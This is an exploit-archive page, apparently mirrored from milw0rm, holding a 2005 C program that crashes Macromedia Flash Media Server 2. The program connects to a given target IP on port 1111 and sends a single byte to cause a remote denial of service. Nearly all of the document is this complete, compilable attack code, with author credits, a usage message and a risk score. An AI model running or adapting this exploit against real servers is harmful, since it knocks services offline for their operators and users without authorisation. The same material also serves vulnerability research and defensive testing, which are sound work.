Macromedia Flash Media Server 2 Remote Denial of Service Exploit

🗓️ 14 Dec 2005 00:00:00Reported by RootType

Macromedia Flash Media Server 2 Remote Denial of Service Exploit by Kozan


                                                /*****************************************************************

Macromedia Flash Media Server 2 Remote D.o.S Exploit by Kozan

Application: Macromedia Flash Media Server
http://www.macromedia.com/software/flashmediaserver/
Vendor: Macromedia

Discovered by:  dr_insane
Exploit Coded by: Kozan
Credits to ATmaCA,  dr_insane
Web: www.spyinstructors.com
Mail: [email protected]

*****************************************************************/

#include &lt;winsock2.h&gt;
#include &lt;stdio.h&gt;
#include &lt;windows.h&gt;

#pragma comment(lib,&quot;ws2_32.lib&quot;)

int nDefaultPort = 1111;

char SingleDoSChar[] = &quot;\x41&quot;;

int main(int argc, char *argv[])
{
       fprintf(stdout, &quot;\n\nMacromedia Flash Media Server 2 Remote D.o.S Exploit by Kozan\n&quot;);
       fprintf(stdout, &quot;Bug Discovered by:  dr_insane\n&quot;);
       fprintf(stdout, &quot;Exploit Coded by: Kozan\n&quot;);
       fprintf(stdout, &quot;Credits to ATmaCA,  dr_insane\n&quot;);
       fprintf(stdout, &quot;www.spyinstructors.com - [email protected]\n\n&quot;);

       if(argc&lt;2)
       {
               fprintf(stderr, &quot;Usage: %s [Target IP]\n\n&quot;, argv[0]);
               return -1;
       }
       WSADATA wsaData;
       SOCKET sock;

       if( WSAStartup(0x0101,&amp;wsaData) &lt; 0 )
       {
               fprintf(stderr, &quot;Winsock error!\n&quot;);
               return -1;
       }

       sock = socket(AF_INET,SOCK_STREAM,0);
       if( sock == -1 )
       {
               fprintf(stderr, &quot;Socket error!\n&quot;);
               return -1;
       }

       struct sockaddr_in addr;

       addr.sin_family = AF_INET;
       addr.sin_port = htons(nDefaultPort);
       addr.sin_addr.s_addr = inet_addr(argv[1]);
       memset(&amp;(addr.sin_zero), '\0', 8);

       fprintf(stdout, &quot;Please wait while connecting to server...\n&quot;);

       if( connect( sock, (struct sockaddr*)&amp;addr, sizeof(struct sockaddr) ) == -1 )
       {
               fprintf(stderr, &quot;Connection failed!\n&quot;);
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, &quot;Please wait while sending single DoS char...\n&quot;);

       if( send(sock,SingleDoSChar,lstrlen(SingleDoSChar),0) == -1 )
       {
               fprintf(stderr, &quot;DoS char could not sent!\n&quot;);
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, &quot;Operation completed...\n&quot;);
       closesocket(sock);
       WSACleanup();

       return 0;
}

// milw0rm.com [2005-12-14]

14 Dec 2005 00:00Current

7.1High risk

Vulners AI Score7.1